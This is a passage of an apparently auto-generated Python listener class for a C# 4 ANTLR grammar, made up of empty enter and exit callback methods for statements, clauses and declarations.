# Exit a parse tree produced by CSharp4Parser#query_body_clauses.
def exitQuery_body_clauses(self, ctx: CSharp4Parser.Query_body_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clause.
def enterQuery_body_clause(self, ctx: CSharp4Parser.Query_body_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clause.
def exitQuery_body_clause(self, ctx: CSharp4Parser.Query_body_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#let_clause.
def enterLet_clause(self, ctx: CSharp4Parser.Let_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#let_clause.
def exitLet_clause(self, ctx: CSharp4Parser.Let_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#where_clause.
def enterWhere_clause(self, ctx: CSharp4Parser.Where_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#where_clause.
def exitWhere_clause(self, ctx: CSharp4Parser.Where_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#join_clause.
def enterJoin_clause(self, ctx: CSharp4Parser.Join_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#join_clause.
def exitJoin_clause(self, ctx: CSharp4Parser.Join_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#join_into_clause.
def enterJoin_into_clause(self, ctx: CSharp4Parser.Join_into_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#join_into_clause.
def exitJoin_into_clause(self, ctx: CSharp4Parser.Join_into_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#combined_join_clause.
def enterCombined_join_clause(self, ctx: CSharp4Parser.Combined_join_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#combined_join_clause.
def exitCombined_join_clause(self, ctx: CSharp4Parser.Combined_join_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_clause.
def enterOrderby_clause(self, ctx: CSharp4Parser.Orderby_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_clause.
def exitOrderby_clause(self, ctx: CSharp4Parser.Orderby_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#orderings.
def enterOrderings(self, ctx: CSharp4Parser.OrderingsContext):
pass
# Exit a parse tree produced by CSharp4Parser#orderings.
def exitOrderings(self, ctx: CSharp4Parser.OrderingsContext):
pass
# Enter a parse tree produced by CSharp4Parser#ordering.
def enterOrdering(self, ctx: CSharp4Parser.OrderingContext):
pass
# Exit a parse tree produced by CSharp4Parser#ordering.
def exitOrdering(self, ctx: CSharp4Parser.OrderingContext):
pass
# Enter a parse tree produced by CSharp4Parser#ordering_direction.
def enterOrdering_direction(self, ctx: CSharp4Parser.Ordering_directionContext):
pass
# Exit a parse tree produced by CSharp4Parser#ordering_direction.
def exitOrdering_direction(self, ctx: CSharp4Parser.Ordering_directionContext):
pass
# Enter a parse tree produced by CSharp4Parser#select_or_group_clause.
def enterSelect_or_group_clause(self, ctx: CSharp4Parser.Select_or_group_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#select_or_group_clause.
def exitSelect_or_group_clause(self, ctx: CSharp4Parser.Select_or_group_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#select_clause.
def enterSelect_clause(self, ctx: CSharp4Parser.Select_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#select_clause.
def exitSelect_clause(self, ctx: CSharp4Parser.Select_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#group_clause.
def enterGroup_clause(self, ctx: CSharp4Parser.Group_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#group_clause.
def exitGroup_clause(self, ctx: CSharp4Parser.Group_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_continuation.
def enterQuery_continuation(self, ctx: CSharp4Parser.Query_continuationContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_continuation.
def exitQuery_continuation(self, ctx: CSharp4Parser.Query_continuationContext):
pass
# Enter a parse tree produced by CSharp4Parser#assignment.
def enterAssignment(self, ctx: CSharp4Parser.AssignmentContext):
pass
# Exit a parse tree produced by CSharp4Parser#assignment.
def exitAssignment(self, ctx: CSharp4Parser.AssignmentContext):
pass
# Enter a parse tree produced by CSharp4Parser#assignment_operator.
def enterAssignment_operator(self, ctx: CSharp4Parser.Assignment_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#assignment_operator.
def exitAssignment_operator(self, ctx: CSharp4Parser.Assignment_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#expression.
def enterExpression(self, ctx: CSharp4Parser.ExpressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#expression.
def exitExpression(self, ctx: CSharp4Parser.ExpressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#non_assignment_expression.
def enterNon_assignment_expression(self, ctx: CSharp4Parser.Non_assignment_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#non_assignment_expression.
def exitNon_assignment_expression(self, ctx: CSharp4Parser.Non_assignment_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#constant_expression.
def enterConstant_expression(self, ctx: CSharp4Parser.Constant_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#constant_expression.
def exitConstant_expression(self, ctx: CSharp4Parser.Constant_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_expression.
def enterBoolean_expression(self, ctx: CSharp4Parser.Boolean_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_expression.
def exitBoolean_expression(self, ctx: CSharp4Parser.Boolean_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement.
def enterStatement(self, ctx: CSharp4Parser.StatementContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement.
def exitStatement(self, ctx: CSharp4Parser.StatementContext):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement.
def enterEmbedded_statement(self, ctx: CSharp4Parser.Embedded_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement.
def exitEmbedded_statement(self, ctx: CSharp4Parser.Embedded_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#simple_embedded_statement.
def enterSimple_embedded_statement(self, ctx: CSharp4Parser.Simple_embedded_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#simple_embedded_statement.
def exitSimple_embedded_statement(self, ctx: CSharp4Parser.Simple_embedded_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#block.
def enterBlock(self, ctx: CSharp4Parser.BlockContext):
pass
# Exit a parse tree produced by CSharp4Parser#block.
def exitBlock(self, ctx: CSharp4Parser.BlockContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement_list.
def enterStatement_list(self, ctx: CSharp4Parser.Statement_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement_list.
def exitStatement_list(self, ctx: CSharp4Parser.Statement_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#empty_statement.
def enterEmpty_statement(self, ctx: CSharp4Parser.Empty_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#empty_statement.
def exitEmpty_statement(self, ctx: CSharp4Parser.Empty_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#labeled_statement.
def enterLabeled_statement(self, ctx: CSharp4Parser.Labeled_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#labeled_statement.
def exitLabeled_statement(self, ctx: CSharp4Parser.Labeled_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#declaration_statement.
def enterDeclaration_statement(self, ctx: CSharp4Parser.Declaration_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#declaration_statement.
def exitDeclaration_statement(self, ctx: CSharp4Parser.Declaration_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declaration.
def enterLocal_variable_declaration(self, ctx: CSharp4Parser.Local_variable_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declaration.
def exitLocal_variable_declaration(self, ctx: CSharp4Parser.Local_variable_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_type.
def enterLocal_variable_type(self, ctx: CSharp4Parser.Local_variable_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_type.
def exitLocal_variable_type(self, ctx: CSharp4Parser.Local_variable_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarators.
def enterLocal_variable_declarators(self, ctx: CSharp4Parser.Local_variable_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarators.
def exitLocal_variable_declarators(self, ctx: CSharp4Parser.Local_variable_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarator.
def enterLocal_variable_declarator(self, ctx: CSharp4Parser.Local_variable_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarator.
def exitLocal_variable_declarator(self, ctx: CSharp4Parser.Local_variable_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer.
def enterLocal_variable_initializer(self, ctx: CSharp4Parser.Local_variable_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer.
def exitLocal_variable_initializer(self, ctx: CSharp4Parser.Local_variable_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_constant_declaration.
def enterLocal_constant_declaration(self, ctx: CSharp4Parser.Local_constant_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_constant_declaration.
def exitLocal_constant_declaration(self, ctx: CSharp4Parser.Local_constant_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#expression_statement.
def enterExpression_statement(self, ctx: CSharp4Parser.Expression_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#expression_statement.
def exitExpression_statement(self, ctx: CSharp4Parser.Expression_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression.
def enterStatement_expression(self, ctx: CSharp4Parser.Statement_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression.
def exitStatement_expression(self, ctx: CSharp4Parser.Statement_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#selection_statement.
def enterSelection_statement(self, ctx: CSharp4Parser.Selection_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#selection_statement.
def exitSelection_statement(self, ctx: CSharp4Parser.Selection_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodyBlock.
def enterIfBodyBlock(self, ctx: CSharp4Parser.IfBodyBlockContext):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodyBlock.
def exitIfBodyBlock(self, ctx: CSharp4Parser.IfBodyBlockContext):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodySingle.
def enterIfBodySingle(self, ctx: CSharp4Parser.IfBodySingleContext):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodySingle.
def exitIfBodySingle(self, ctx: CSharp4Parser.IfBodySingleContext):
pass
# Enter a parse tree produced by CSharp4Parser#if_statement.
def enterIf_statement(self, ctx: CSharp4Parser.If_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#if_statement.
def exitIf_statement(self, ctx: CSharp4Parser.If_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_statement.
def enterSwitch_statement(self, ctx: CSharp4Parser.Switch_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_statement.
def exitSwitch_statement(self, ctx: CSharp4Parser.Switch_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_block.
def enterSwitch_block(self, ctx: CSharp4Parser.Switch_blockContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_block.
def exitSwitch_block(self, ctx: CSharp4Parser.Switch_blockContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_sections.
def enterSwitch_sections(self, ctx: CSharp4Parser.Switch_sectionsContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_sections.
def exitSwitch_sections(self, ctx: CSharp4Parser.Switch_sectionsContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_section.
def enterSwitch_section(self, ctx: CSharp4Parser.Switch_sectionContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_section.
def exitSwitch_section(self, ctx: CSharp4Parser.Switch_sectionContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_labels.
def enterSwitch_labels(self, ctx: CSharp4Parser.Switch_labelsContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_labels.
def exitSwitch_labels(self, ctx: CSharp4Parser.Switch_labelsContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_label.
def enterSwitch_label(self, ctx: CSharp4Parser.Switch_labelContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_label.
def exitSwitch_label(self, ctx: CSharp4Parser.Switch_labelContext):
pass
# Enter a parse tree produced by CSharp4Parser#iteration_statement.
def enterIteration_statement(self, ctx: CSharp4Parser.Iteration_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#iteration_statement.
def exitIteration_statement(self, ctx: CSharp4Parser.Iteration_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#while_statement.
def enterWhile_statement(self, ctx: CSharp4Parser.While_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#while_statement.
def exitWhile_statement(self, ctx: CSharp4Parser.While_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#do_statement.
def enterDo_statement(self, ctx: CSharp4Parser.Do_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#do_statement.
def exitDo_statement(self, ctx: CSharp4Parser.Do_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_statement.
def enterFor_statement(self, ctx: CSharp4Parser.For_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_statement.
def exitFor_statement(self, ctx: CSharp4Parser.For_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_initializer.
def enterFor_initializer(self, ctx: CSharp4Parser.For_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_initializer.
def exitFor_initializer(self, ctx: CSharp4Parser.For_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_condition.
def enterFor_condition(self, ctx: CSharp4Parser.For_conditionContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_condition.
def exitFor_condition(self, ctx: CSharp4Parser.For_conditionContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_iterator.
def enterFor_iterator(self, ctx: CSharp4Parser.For_iteratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_iterator.
def exitFor_iterator(self, ctx: CSharp4Parser.For_iteratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression_list.
def enterStatement_expression_list(self, ctx: CSharp4Parser.Statement_expression_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression_list.
def exitStatement_expression_list(self, ctx: CSharp4Parser.Statement_expression_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#foreach_statement.
def enterForeach_statement(self, ctx: CSharp4Parser.Foreach_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#foreach_statement.
def exitForeach_statement(self, ctx: CSharp4Parser.Foreach_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#jump_statement.
def enterJump_statement(self, ctx: CSharp4Parser.Jump_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#jump_statement.
def exitJump_statement(self, ctx: CSharp4Parser.Jump_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#break_statement.
def enterBreak_statement(self, ctx: CSharp4Parser.Break_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#break_statement.
def exitBreak_statement(self, ctx: CSharp4Parser.Break_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#continue_statement.
def enterContinue_statement(self, ctx: CSharp4Parser.Continue_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#continue_statement.
def exitContinue_statement(self, ctx: CSharp4Parser.Continue_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#goto_statement.
def enterGoto_statement(self, ctx: CSharp4Parser.Goto_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#goto_statement.
def exitGoto_statement(self, ctx: CSharp4Parser.Goto_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#return_statement.
def enterReturn_statement(self, ctx: CSharp4Parser.Return_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#return_statement.
def exitReturn_statement(self, ctx: CSharp4Parser.Return_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#throw_statement.
def enterThrow_statement(self, ctx: CSharp4Parser.Throw_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#throw_statement.
def exitThrow_statement(self, ctx: CSharp4Parser.Throw_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#try_statement.
def enterTry_statement(self, ctx: CSharp4Parser.Try_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#try_statement.
def exitTry_statement(self, ctx: CSharp4Parser.Try_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#catch_clauses.
def enterCatch_clauses(self, ctx: CSharp4Parser.Catch_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#catch_clauses.
def exitCatch_clauses(self, ctx: CSharp4Parser.Catch_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clauses.
def enterSpecific_catch_clauses(self, ctx: CSharp4Parser.Specific_catch_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clauses.
def exitSpecific_catch_clauses(self, ctx: CSharp4Parser.Specific_catch_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clause.
def enterSpecific_catch_clause(self, ctx: CSharp4Parser.Specific_catch_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clause.
def exitSpecific_catch_clause(self, ctx: CSharp4Parser.Specific_catch_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#general_catch_clause.
def enterGeneral_catch_clause(self, ctx: CSharp4Parser.General_catch_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#general_catch_clause.
def exitGeneral_catch_clause(self, ctx: CSharp4Parser.General_catch_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#finally_clause.
def enterFinally_clause(self, ctx: CSharp4Parser.Finally_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#finally_clause.
def exitFinally_clause(self, ctx: CSharp4Parser.Finally_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#checked_statement.
def enterChecked_statement(self, ctx: CSharp4Parser.Checked_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#checked_statement.
def exitChecked_statement(self, ctx: CSharp4Parser.Checked_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_statement.
def enterUnchecked_statement(self, ctx: CSharp4Parser.Unchecked_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_statement.
def exitUnchecked_statement(self, ctx: CSharp4Parser.Unchecked_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#lock_statement.
def enterLock_statement(self, ctx: CSharp4Parser.Lock_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#lock_statement.
def exitLock_statement(self, ctx: CSharp4Parser.Lock_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_statement.
def enterUsing_statement(self, ctx: CSharp4Parser.Using_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_statement.
def exitUsing_statement(self, ctx: CSharp4Parser.Using_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#resource_acquisition.
def enterResource_acquisition(self, ctx: CSharp4Parser.Resource_acquisitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#resource_acquisition.
def exitResource_acquisition(self, ctx: CSharp4Parser.Resource_acquisitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#yield_statement.
def enterYield_statement(self, ctx: CSharp4Parser.Yield_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#yield_statement.
def exitYield_statement(self, ctx: CSharp4Parser.Yield_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#parse.
def enterParse(self, ctx: CSharp4Parser.ParseContext):
pass
# Exit a parse tree produced by CSharp4Parser#parse.
def exitParse(self, ctx: CSharp4Parser.ParseContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_declaration.
def enterNamespace_declaration(self, ctx: CSharp4Parser.Namespace_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_declaration.
def exitNamespace_declaration(self, ctx: CSharp4Parser.Namespace_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_identifier.
def enterQualified_identifier(self, ctx: CSharp4Parser.Qualified_identifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_identifier.
def exitQualified_identifier(self, ctx: CSharp4Parser.Qualified_identifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_body.
def enterNamespace_body(self, ctx: CSharp4Parser.Namespace_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_body.
def exitNamespace_body(self, ctx: CSharp4Parser.Namespace_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directives.
def enterExtern_alias_directives(self, ctx: CSharp4Parser.Extern_alias_directivesContext):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directives.
def exitExtern_alias_directives(self, ctx: CSharp4Parser.Extern_alias_directivesContext):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directive.
def enterExtern_alias_directive(self, ctx: CSharp4Parser.Extern_alias_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directive.
def exitExtern_alias_directive(self, ctx: CSharp4Parser.Extern_alias_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_directives.
def enterUsing_directives(self, ctx: CSharp4Parser.Using_directivesContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_directives.
def exitUsing_directives(self, ctx: CSharp4Parser.Using_directivesContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_directive.
def enterUsing_directive(self, ctx: CSharp4Parser.Using_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_directive.
def exitUsing_directive(self, ctx: CSharp4Parser.Using_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_alias_directive.
def enterUsing_alias_directive(self, ctx: CSharp4Parser.Using_alias_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_alias_directive.
def exitUsing_alias_directive(self, ctx: CSharp4Parser.Using_alias_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_namespace_directive.
def enterUsing_namespace_directive(self, ctx: CSharp4Parser.Using_namespace_directiveContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_namespace_directive.
def exitUsing_namespace_directive(self, ctx: CSharp4Parser.Using_namespace_directiveContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declarations.
def enterNamespace_member_declarations(self, ctx: CSharp4Parser.Namespace_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declarations.
def exitNamespace_member_declarations(self, ctx: CSharp4Parser.Namespace_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_member_declaration.
def enterNamespace_member_declaration(self, ctx: CSharp4Parser.Namespace_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_member_declaration.
def exitNamespace_member_declaration(self, ctx: CSharp4Parser.Namespace_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_declaration.
def enterType_declaration(self, ctx: CSharp4Parser.Type_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_declaration.
def exitType_declaration(self, ctx: CSharp4Parser.Type_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_alias_member.
def enterQualified_alias_member(self, ctx: CSharp4Parser.Qualified_alias_memberContext):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_alias_member.
def exitQualified_alias_member(self, ctx: CSharp4Parser.Qualified_alias_memberContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_declaration.
def enterClass_declaration(self, ctx: CSharp4Parser.Class_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_declaration.
def exitClass_declaration(self, ctx: CSharp4Parser.Class_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifiers.
def enterClass_modifiers(self, ctx: CSharp4Parser.Class_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifiers.
def exitClass_modifiers(self, ctx: CSharp4Parser.Class_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier.
def enterClass_modifier(self, ctx: CSharp4Parser.Class_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier.
def exitClass_modifier(self, ctx: CSharp4Parser.Class_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_list.
def enterType_parameter_list(self, ctx: CSharp4Parser.Type_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_list.
def exitType_parameter_list(self, ctx: CSharp4Parser.Type_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameters.
def enterType_parameters(self, ctx: CSharp4Parser.Type_parametersContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameters.
def exitType_parameters(self, ctx: CSharp4Parser.Type_parametersContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter.
def enterType_parameter(self, ctx: CSharp4Parser.Type_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter.
def exitType_parameter(self, ctx: CSharp4Parser.Type_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_base.
def enterClass_base(self, ctx: CSharp4Parser.Class_baseContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_base.
def exitClass_base(self, ctx: CSharp4Parser.Class_baseContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type_list.
def enterInterface_type_list(self, ctx: CSharp4Parser.Interface_type_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type_list.
def exitInterface_type_list(self, ctx: CSharp4Parser.Interface_type_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_constraints_clauses.
def enterType_parameter_constraints_clauses(self, ctx: CSharp4Parser.Type_parameter_constraints_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_constraints_clauses.
def exitType_parameter_constraints_clauses(self, ctx: CSharp4Parser.Type_parameter_constraints_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_constraints_clause.
def enterType_parameter_constraints_clause(self, ctx: CSharp4Parser.Type_parameter_constraints_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_constraints_clause.
def exitType_parameter_constraints_clause(self, ctx: CSharp4Parser.Type_parameter_constraints_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_parameter_constraints.
def enterType_parameter_constraints(self, ctx: CSharp4Parser.Type_parameter_constraintsContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_parameter_constraints.
def exitType_parameter_constraints(self, ctx: CSharp4Parser.Type_parameter_constraintsContext):
pass
# Enter a parse tree produced by CSharp4Parser#primary_constraint.
def enterPrimary_constraint(self, ctx: CSharp4Parser.Primary_constraintContext):
pass
# Exit a parse tree produced by CSharp4Parser#primary_constraint.
def exitPrimary_constraint(self, ctx: CSharp4Parser.Primary_constraintContext):
pass
# Enter a parse tree produced by CSharp4Parser#secondary_constraints.
def enterSecondary_constraints(self, ctx: CSharp4Parser.Secondary_constraintsContext):
pass
# Exit a parse tree produced by CSharp4Parser#secondary_constraints.
def exitSecondary_constraints(self, ctx: CSharp4Parser.Secondary_constraintsContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_constraint.
def enterConstructor_constraint(self, ctx: CSharp4Parser.Constructor_constraintContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_constraint.
def exitConstructor_constraint(self, ctx: CSharp4Parser.Constructor_constraintContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_body.
def enterClass_body(self, ctx: CSharp4Parser.Class_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_body.
def exitClass_body(self, ctx: CSharp4Parser.Class_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declarations.
def enterClass_member_declarations(self, ctx: CSharp4Parser.Class_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declarations.
def exitClass_member_declarations(self, ctx: CSharp4Parser.Class_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_member_declaration.
def enterClass_member_declaration(self, ctx: CSharp4Parser.Class_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_member_declaration.
def exitClass_member_declaration(self, ctx: CSharp4Parser.Class_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifiers.
def enterAll_member_modifiers(self, ctx: CSharp4Parser.All_member_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifiers.
def exitAll_member_modifiers(self, ctx: CSharp4Parser.All_member_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#all_member_modifier.
def enterAll_member_modifier(self, ctx: CSharp4Parser.All_member_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#all_member_modifier.
def exitAll_member_modifier(self, ctx: CSharp4Parser.All_member_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#common_member_declaration.
def enterCommon_member_declaration(self, ctx: CSharp4Parser.Common_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#common_member_declaration.
def exitCommon_member_declaration(self, ctx: CSharp4Parser.Common_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#typed_member_declaration.
def enterTyped_member_declaration(self, ctx: CSharp4Parser.Typed_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#typed_member_declaration.
def exitTyped_member_declaration(self, ctx: CSharp4Parser.Typed_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarators.
